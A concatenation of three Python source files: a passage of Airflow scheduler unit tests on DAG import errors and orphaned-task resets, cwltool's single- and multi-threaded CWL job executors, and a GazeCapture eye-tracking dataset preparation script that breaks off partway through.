unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# no_dags.py is empty; the _invalid_ files are skipped via .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
executors.py
|
# -*- coding: utf-8 -*-
""" Single and multi-threaded executors."""
import datetime
import logging
import os
import tempfile
import threading
from abc import ABCMeta, abstractmethod
from threading import Lock
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union
import psutil
from schema_salad.validate import ValidationException
from .command_line_tool import CallbackJob
from .context import RuntimeContext, getdefault
from .errors import WorkflowException
from .job import JobBase
from .loghandler import _logger
from .mutation import MutationManager
from .process import Process, cleanIntermediate, relocateOutputs
from .provenance import ProvenanceProfile
from .utils import DEFAULT_TMP_PREFIX
from .workflow import Workflow, WorkflowJob, WorkflowJobStep
TMPDIR_LOCK = Lock()
class JobExecutor(object, metaclass=ABCMeta):
"""Abstract base job executor."""
def __init__(self):
# type: (...) -> None
"""Initialize."""
self.final_output = (
[]
) # type: List[Union[Dict[str, Any], List[Dict[str, Any]]]]
self.final_status = [] # type: List[str]
self.output_dirs = set() # type: Set[str]
def __call__(self, *args, **kwargs): # type: (*Any, **Any) -> Any
return self.execute(*args, **kwargs)
def output_callback(self, out: Dict[str, Any], process_status: str) -> None:
"""Collect the final status and outputs."""
self.final_status.append(process_status)
self.final_output.append(out)
@abstractmethod
def run_jobs(
self,
process: Process,
job_order_object: Dict[str, Any],
logger: logging.Logger,
runtime_context: RuntimeContext,
) -> None:
"""Execute the jobs for the given Process."""
def execute(
self,
process, # type: Process
job_order_object, # type: Dict[str, Any]
runtime_context, # type: RuntimeContext
logger=_logger, # type: logging.Logger
): # type: (...) -> Tuple[Optional[Union[Dict[str, Any], List[Dict[str, Any]]]], str]
"""Execute the process."""
if not runtime_context.basedir:
raise WorkflowException("Must provide 'basedir' in runtimeContext")
finaloutdir = None  # type: Optional[str]
original_outdir = runtime_context.outdir
if isinstance(original_outdir, str):
finaloutdir = os.path.abspath(original_outdir)
runtime_context = runtime_context.copy()
outdir = tempfile.mkdtemp(
prefix=getdefault(runtime_context.tmp_outdir_prefix, DEFAULT_TMP_PREFIX)
)
self.output_dirs.add(outdir)
runtime_context.outdir = outdir
runtime_context.mutation_manager = MutationManager()
runtime_context.toplevel = True
runtime_context.workflow_eval_lock = threading.Condition(threading.RLock())
job_reqs = None
if "https://w3id.org/cwl/cwl#requirements" in job_order_object:
if (
process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion")
== "v1.0"
):
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1"
)
job_reqs = job_order_object["https://w3id.org/cwl/cwl#requirements"]
elif (
"cwl:defaults" in process.metadata
and "https://w3id.org/cwl/cwl#requirements"
in process.metadata["cwl:defaults"]
):
if (
process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion")
== "v1.0"
):
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1"
)
job_reqs = process.metadata["cwl:defaults"][
"https://w3id.org/cwl/cwl#requirements"
]
if job_reqs is not None:
for req in job_reqs:
process.requirements.append(req)
self.run_jobs(process, job_order_object, logger, runtime_context)
if (
self.final_output
and self.final_output[0] is not None
and finaloutdir is not None
):
self.final_output[0] = relocateOutputs(
self.final_output[0],
finaloutdir,
self.output_dirs,
runtime_context.move_outputs,
runtime_context.make_fs_access(""),
getdefault(runtime_context.compute_checksum, True),
path_mapper=runtime_context.path_mapper,
)
if runtime_context.rm_tmpdir:
if runtime_context.cachedir is None:
output_dirs = self.output_dirs # type: Iterable[Any]
else:
output_dirs = filter(
lambda x: not x.startswith(runtime_context.cachedir),
self.output_dirs,
)
cleanIntermediate(output_dirs)
if self.final_output and self.final_status:
if (
runtime_context.research_obj is not None
and isinstance(
process, (JobBase, Process, WorkflowJobStep, WorkflowJob)
)
and process.parent_wf
):
process_run_id = None
name = "primary"
process.parent_wf.generate_output_prov(
self.final_output[0], process_run_id, name
)
process.parent_wf.document.wasEndedBy(
process.parent_wf.workflow_run_uri,
None,
process.parent_wf.engine_uuid,
datetime.datetime.now(),
)
process.parent_wf.finalize_prov_profile(name=None)
return (self.final_output[0], self.final_status[0])
return (None, "permanentFail")
class SingleJobExecutor(JobExecutor):
"""Default single-threaded CWL reference executor."""
def run_jobs(
self,
process, # type: Process
job_order_object, # type: Dict[str, Any]
logger, # type: logging.Logger
runtime_context, # type: RuntimeContext
): # type: (...) -> None
process_run_id = None # type: Optional[str]
# define provenance profile for single commandline tool
if (
not isinstance(process, Workflow)
and runtime_context.research_obj is not None
):
process.provenance_object = ProvenanceProfile(
runtime_context.research_obj,
full_name=runtime_context.cwl_full_name,
host_provenance=False,
user_provenance=False,
orcid=runtime_context.orcid,
# single tool execution, so RO UUID = wf UUID = tool UUID
run_uuid=runtime_context.research_obj.ro_uuid,
fsaccess=runtime_context.make_fs_access(""),
)
process.parent_wf = process.provenance_object
jobiter = process.job(job_order_object, self.output_callback, runtime_context)
try:
for job in jobiter:
if job is not None:
if runtime_context.builder is not None:
job.builder = runtime_context.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
if runtime_context.research_obj is not None:
if not isinstance(process, Workflow):
prov_obj = process.provenance_object
else:
prov_obj = job.prov_obj
if prov_obj:
runtime_context.prov_obj = prov_obj
prov_obj.fsaccess = runtime_context.make_fs_access("")
prov_obj.evaluate(
process,
job,
job_order_object,
runtime_context.research_obj,
)
process_run_id = prov_obj.record_process_start(process, job)
runtime_context = runtime_context.copy()
runtime_context.process_run_id = process_run_id
job.run(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
except (
ValidationException,
WorkflowException,
): # pylint: disable=try-except-raise
raise
except Exception as err:
logger.exception("Got workflow error")
raise WorkflowException(str(err)) from err
class MultithreadedJobExecutor(JobExecutor):
"""
Experimental multi-threaded CWL executor.
Performs simple resource accounting: a job is not started unless enough
cores / RAM are available, but no attempt is made to optimize usage.
"""
def __init__(self): # type: () -> None
"""Initialize."""
super(MultithreadedJobExecutor, self).__init__()
self.threads = set() # type: Set[threading.Thread]
self.exceptions = [] # type: List[WorkflowException]
self.pending_jobs = [] # type: List[Union[JobBase, WorkflowJob]]
self.pending_jobs_lock = threading.Lock()
self.max_ram = int(psutil.virtual_memory().available / 2 ** 20)
self.max_cores = psutil.cpu_count()
self.allocated_ram = 0
self.allocated_cores = 0
def select_resources(
self, request, runtime_context
): # pylint: disable=unused-argument
# type: (Dict[str, int], RuntimeContext) -> Dict[str, int]
"""Naïve check for available cpu cores and memory."""
result = {} # type: Dict[str, int]
maxrsc = {"cores": self.max_cores, "ram": self.max_ram}
for rsc in ("cores", "ram"):
if request[rsc + "Min"] > maxrsc[rsc]:
raise WorkflowException(
"Requested at least %d %s but only %d available"
% (request[rsc + "Min"], rsc, maxrsc[rsc])
)
if request[rsc + "Max"] < maxrsc[rsc]:
result[rsc] = request[rsc + "Max"]
else:
result[rsc] = maxrsc[rsc]
return result
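# Illustrative example (not part of the original module): with max_cores=4 and
# max_ram=8192, a request of {"coresMin": 1, "coresMax": 2, "ramMin": 256,
# "ramMax": 16384} resolves to {"cores": 2, "ram": 8192} -- the requested Max is
# used when it fits on the host, otherwise the host maximum is used, and a Min
# above the host maximum raises WorkflowException.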
def _runner(self, job, runtime_context, TMPDIR_LOCK):
# type: (Union[JobBase, WorkflowJob, CallbackJob], RuntimeContext, threading.Lock) -> None
"""Job running thread."""
try:
_logger.debug(
"job: {}, runtime_context: {}, TMPDIR_LOCK: {}".format(
job, runtime_context, TMPDIR_LOCK
)
)
job.run(runtime_context, TMPDIR_LOCK)
except WorkflowException as err:
_logger.exception("Got workflow error")
self.exceptions.append(err)
except Exception as err: # pylint: disable=broad-except
_logger.exception("Got workflow error")
self.exceptions.append(WorkflowException(str(err)))
finally:
if runtime_context.workflow_eval_lock:
with runtime_context.workflow_eval_lock:
self.threads.remove(threading.current_thread())
if isinstance(job, JobBase):
self.allocated_ram -= job.builder.resources["ram"]
self.allocated_cores -= job.builder.resources["cores"]
runtime_context.workflow_eval_lock.notifyAll()
def run_job(
self,
job, # type: Union[JobBase, WorkflowJob, None]
runtime_context, # type: RuntimeContext
): # type: (...) -> None
"""Execute a single Job in a seperate thread."""
if job is not None:
with self.pending_jobs_lock:
self.pending_jobs.append(job)
with self.pending_jobs_lock:
n = 0
while (n + 1) <= len(self.pending_jobs):
job = self.pending_jobs[n]
if isinstance(job, JobBase):
if (job.builder.resources["ram"]) > self.max_ram or (
job.builder.resources["cores"]
) > self.max_cores:
_logger.error(
'Job "%s" cannot be run, requests more resources (%s) '
"than available on this host (max ram %d, max cores %d",
job.name,
job.builder.resources,
self.max_ram,
self.max_cores,
)
self.pending_jobs.remove(job)
return
if (
(self.allocated_ram + job.builder.resources["ram"])
> self.max_ram
or (self.allocated_cores + job.builder.resources["cores"])
> self.max_cores
):
_logger.debug(
'Job "%s" cannot run yet, resources (%s) are not '
"available (already allocated ram is %d, allocated cores is %d, "
"max ram %d, max cores %d",
job.name,
job.builder.resources,
self.allocated_ram,
self.allocated_cores,
self.max_ram,
self.max_cores,
)
n += 1
continue
thread = threading.Thread(
target=self._runner, args=(job, runtime_context, TMPDIR_LOCK)
)
thread.daemon = True
self.threads.add(thread)
if isinstance(job, JobBase):
self.allocated_ram += job.builder.resources["ram"]
self.allocated_cores += job.builder.resources["cores"]
thread.start()
self.pending_jobs.remove(job)
def wait_for_next_completion(self, runtime_context):
# type: (RuntimeContext) -> None
"""Wait for jobs to finish."""
if runtime_context.workflow_eval_lock is not None:
runtime_context.workflow_eval_lock.wait()
if self.exceptions:
raise self.exceptions[0]
def run_jobs(
self,
process, # type: Process
job_order_object, # type: Dict[str, Any]
logger, # type: logging.Logger
runtime_context, # type: RuntimeContext
): # type: (...) -> None
jobiter = process.job(job_order_object, self.output_callback, runtime_context)
if runtime_context.workflow_eval_lock is None:
raise WorkflowException(
"runtimeContext.workflow_eval_lock must not be None"
)
runtime_context.workflow_eval_lock.acquire()
for job in jobiter:
if job is not None:
if isinstance(job, JobBase):
job.builder = runtime_context.builder or job.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
self.run_job(job, runtime_context)
if job is None:
if self.threads:
self.wait_for_next_completion(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
self.run_job(None, runtime_context)
while self.threads:
self.wait_for_next_completion(runtime_context)
self.run_job(None, runtime_context)
runtime_context.workflow_eval_lock.release()
|
prepareDataset-checkpoint.py
|
import math, shutil, os, time, argparse, json, re, sys
import numpy as np
import scipy.io as sio
from PIL import Image
import multiprocessing
from multiprocessing import Queue
from operator import itemgetter
import pprint as pp
'''
Prepares the GazeCapture dataset for use with the pytorch code. Crops images, compiles JSONs into metadata.mat
Author: Petr Kellnhofer ( pkel_lnho (at) gmai_l.com // remove underscores and spaces), 2018.
Website: http://gazecapture.csail.mit.edu/
Cite:
Eye Tracking for Everyone
K.Krafka*, A. Khosla*, P. Kellnhofer, H. Kannan, S. Bhandarkar, W. Matusik and A. Torralba
IEEE Conference on Computer Vision and Pattern Recognition (CVPR), 2016
@inproceedings{cvpr2016_gazecapture,
Author = {Kyle Krafka and Aditya Khosla and Petr Kellnhofer and Harini Kannan and Suchendra Bhandarkar and Wojciech Matusik and Antonio Torralba},
Title = {Eye Tracking for Everyone},
Year = {2016},
Booktitle = {IEEE Conference on Computer Vision and Pattern Recognition (CVPR)}
}
'''
parser = argparse.ArgumentParser(description='iTracker-pytorch-PrepareDataset.')
parser.add_argument('--dataset_path', help="Path to extracted files. It should have folders called '%%05d' in it.")
parser.add_argument('--output_path', default=None, help="Where to write the output. Can be the same as dataset_path if you wish (=default).")
args = parser.parse_args()
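# Example invocation (illustrative; the paths are placeholders, not part of the
# original script):
#   python prepareDataset.py --dataset_path /data/GazeCapture --output_path /data/GazeCapture_out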
g_meta_queue = Queue()
g_meta_list = []
g_meta = {
'labelRecNum': [],
'frameIndex': [],
'labelDotXCam': [],
'labelDotYCam': [],
'labelFaceGrid': [],
}
def process_recording(recordings, thread_id):
# Output structure
meta = {
'labelRecNum': [],
'frameIndex': [],
'labelDotXCam': [],
'labelDotYCam': [],
'labelFaceGrid': [],
}
for i,recording in enumerate(recordings):
print('[%d/%d] Thread %d Processing recording %s (%.2f%%)' % (i, len(recordings), thread_id, recording, i / len(recordings) * 100))
recDir = os.path.join(args.dataset_path, recording)
recDirOut = os.path.join(args.output_path, recording)
# Read JSONs
appleFace = readJson(os.path.join(recDir, 'appleFace.json'))
if appleFace is None:
continue
appleLeftEye = readJson(os.path.join(recDir, 'appleLeftEye.json'))
if appleLeftEye is None:
continue
appleRightEye = readJson(os.path.join(recDir, 'appleRightEye.json'))
if appleRightEye is None:
continue
dotInfo = readJson(os.path.join(recDir, 'dotInfo.json'))
if dotInfo is None:
continue
faceGrid = readJson(os.path.join(recDir, 'faceGrid.json'))
if faceGrid is None:
continue
frames = readJson(os.path.join(recDir, 'frames.json'))
if frames is None:
continue
# info = readJson(os.path.join(recDir, 'info.json'))
# if info is None:
# continue
# screen = readJson(os.path.join(recDir, 'screen.json'))
# if screen is None:
# continue
facePath = preparePath(os.path.join(recDirOut, 'appleFace'))
leftEyePath = preparePath(os.path.join(recDirOut, 'appleLeftEye'))
rightEyePath = preparePath(os.path.join(recDirOut, 'appleRightEye'))
# Preprocess
allValid = np.logical_and(np.logical_and(appleFace['IsValid'], appleLeftEye['IsValid']), np.logical_and(appleRightEye['IsValid'], faceGrid['IsValid']))
if not np.any(allValid):
continue
frames = np.array([int(re.match(r'(\d{5})\.jpg$', x).group(1)) for x in frames])
bboxFromJson = lambda data: np.stack((data['X'], data['Y'], data['W'],data['H']), axis=1).astype(int)
faceBbox = bboxFromJson(appleFace) + [-1,-1,1,1] # for compatibility with matlab code
leftEyeBbox = bboxFromJson(appleLeftEye) + [0,-1,0,0]
rightEyeBbox = bboxFromJson(appleRightEye) + [0,-1,0,0]
leftEyeBbox[:,:2] += faceBbox[:,:2] # relative to face
rightEyeBbox[:,:2] += faceBbox[:,:2]
faceGridBbox = bboxFromJson(faceGrid)
for j,frame in enumerate(frames):
# Can we use it?
if not allValid[j]:
continue
# Load image
imgFile = os.path.join(recDir, 'frames', '%05d.jpg' % frame)
if not os.path.isfile(imgFile):
logError('Warning: Could not read image file %s!' % imgFile)
continue
img = Image.open(imgFile)
if img is None:
logError('Warning: Could not read image file %s!' % imgFile)
continue
img = np.array(img.convert('RGB'))
# Crop images
imFace = cropImage(img, faceBbox[j,:])
imEyeL = cropImage(img, leftEyeBbox[j,:])
imEyeR = cropImage(img, rightEyeBbox[j,:])
# Save images
Image.fromarray(imFace).save(os.path.join(facePath, '%05d.jpg' % frame), quality=95)
Image.fromarray(imEyeL).save(os.path.join(leftEyePath, '%05d.jpg' % frame), quality=95)
Image.fromarray(imEyeR).save(os.path.join(rightEyePath, '%05d.jpg' % frame), quality=95)
# Collect metadata
meta['labelRecNum'] += [int(recording)]
meta['frameIndex'] += [frame]
meta['labelDotXCam'] += [dotInfo['XCam'][j]]
meta['labelDotYCam'] += [dotInfo['YCam'][j]]
meta['labelFaceGrid'] += [faceGridBbox[j,:]]
return meta
def run_process(thread_id, name, recordings):
print("Starting " + name)
meta = process_recording(recordings, thread_id)
meta_tup = (thread_id, meta) # Tuple so we can sort later on
# Add to global thread-safe queue
g_meta_queue.put(meta_tup)
print("{} finished. Processed {} recordings".format(name, len(recordings)))
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
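# Example (illustrative, not in the original script):
#   list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]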
def split(a, n):
k, m = divmod(len(a), n)
return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))
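# Example (illustrative, not in the original script): split() hands out nearly
# equal shares and front-loads the remainder:
#   list(split(list(range(10)), 3)) -> [[0, 1, 2, 3], [4, 5, 6], [7, 8, 9]]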
def main():
if args.output_path is None:
args.output_path = args.dataset_path
if args.dataset_path is None or not os.path.isdir(args.dataset_path):
raise RuntimeError('No such dataset folder %s!' % args.dataset_path)
preparePath(args.output_path)
# list recordings
recordings = os.listdir(args.dataset_path)
recordings = np.array(recordings, dtype=object)
recordings = recordings[[os.path.isdir(os.path.join(args.dataset_path, r)) for r in recordings]]
recordings.sort()
NUM_THREADS = 15
# num_recordings = len(recordings)
# Max number of recordings a thread can have.
# Thus, (N-1) threads will have M recordings each. The last thread will have the remainder.
# max_recordings_per_thread = math.ceil(num_recordings/NUM_THREADS)
# Split recordings into approximately equal sized chunks for each thread
chunked_recordings = list(split(recordings, NUM_THREADS))
processes = []
pp.pprint(chunked_recordings)
num_processes = 0
for i,recording in enumerate(chunked_recordings):
# Start parallel processes
name = "Thread " + str(i)
p = multiprocessing.Process(target=run_process, args=(i, name, recording))
processes.append((i, p))
p.start()
num_processes += 1
meta_list = []
num_processes_remaining = int(num_processes)
while num_processes_remaining > 0:
while not g_meta_queue.empty():
meta_list.append(g_meta_queue.get())
num_processes_remaining -= 1
print("{} processes remaining".format(num_processes_remaining))
time.sleep(5)
for p_tup in processes:
p_id, p = p_tup
# Join processes
p.join()
print("Joined process {}".format(p_id))
# Sort meta_list in order of thread id (so lower thread num comes first)
meta_list.sort(key=itemgetter(0))
for item in meta_list:
thread_id, meta = item
for key in meta:
g_meta[key] += meta[key]
print("Created g_meta database")
# Integrate
g_meta['labelRecNum'] = np.stack(g_meta['labelRecNum'], axis = 0).astype(np.int16)
g_meta['frameIndex'] = np.stack(g_meta['frameIndex'], axis = 0).astype(np.int32)
g_meta['labelDotXCam'] = np.stack(g_meta['labelDotXCam'], axis = 0)
g_meta['labelDotYCam'] = np.stack(g_meta['labelDotYCam'], axis = 0)
g_meta['labelFaceGrid'] = np.stack(g_meta['labelFaceGrid'], axis = 0).astype(np.uint8)
# Load reference metadata
print('Will compare to the reference GitHub dataset metadata.mat...')
reference = sio.loadmat('./reference_metadata.mat', struct_as_record=False)
reference['labelRecNum'] = reference['labelRecNum'].flatten()
reference['frameIndex'] = reference['frameIndex'].flatten()
reference['labelDotXCam'] = reference['labelDotXCam'].flatten()
reference['labelDotYCam'] = reference['labelDotYCam'].flatten()
reference['labelTrain'] = reference['labelTrain'].flatten()
reference['labelVal'] = reference['labelVal'].flatten()
reference['labelTest'] = reference['labelTest'].flatten()
# Find mapping
mKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(g_meta['labelRecNum'], g_meta['frameIndex'])], dtype=object)
rKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(reference['labelRecNum'], reference['frameIndex'])], dtype=object)
mIndex = {k: i for i,k in enumerate(mKey)}
rIndex = {k: i for i,k in enumerate(rKey)}
mToR = np.zeros((len(mKey,)),int) - 1
for i,k in enumerate(mKey):
if k in rIndex:
mToR[i] = rIndex[k]
else:
logError('Did not find rec_frame %s from the new dataset in the reference dataset!' % k)
rToM = np.zeros((len(rKey,)),int) - 1
for i,k in enumerate(rKey):
if k in mIndex:
rToM[i] = mIndex[k]
else:
logError('Did not find rec_frame %s from the reference dataset in the new dataset!' % k, critical = False)
#break
# Copy split from reference
g_meta['labelTrain'] = np.zeros(len(g_meta['labelRecNum']), dtype=bool)
g_meta['labelVal'] = np.ones(len(g_meta['labelRecNum']), dtype=bool) # default choice
g_meta['labelTest'] = np.zeros(len(g_meta['labelRecNum']), dtype=bool)
validMappingMask = mToR >= 0
g_meta['labelTrain'][validMappingMask] = reference['labelTrain'][mToR[validMappingMask]]
g_meta['labelVal'][validMappingMask] = reference['labelVal'][mToR[validMappingMask]]
g_meta['labelTest'][validMappingMask] = reference['labelTest'][mToR[validMappingMask]]
# Write out metadata
metaFile = os.path.join(args.output_path, 'metadata.mat')
print('Writing out the metadata.mat to %s...' % metaFile)
sio.savemat(metaFile, g_meta)
# Statistics
nMissing = np.sum(rToM < 0)
nExtra = np.sum(mToR < 0)
totalMatch = len(mKey) == len(rKey) and np.all(np.equal(mKey, rKey))
print('======================\n\tSummary\n======================')
print('Total added %d frames from %d recordings.' % (len(g_meta['frameIndex']), len(np.unique(g_meta['labelRecNum']))))
if nMissing > 0:
print('There are %d frames missing in the new dataset. This may affect the results. Check the log to see which files are missing.' % nMissing)
else:
print('There are no missing files.')
if nExtra > 0:
print('There are %d extra frames in the new dataset. This is generally ok as they were marked for validation split only.' % nExtra)
else:
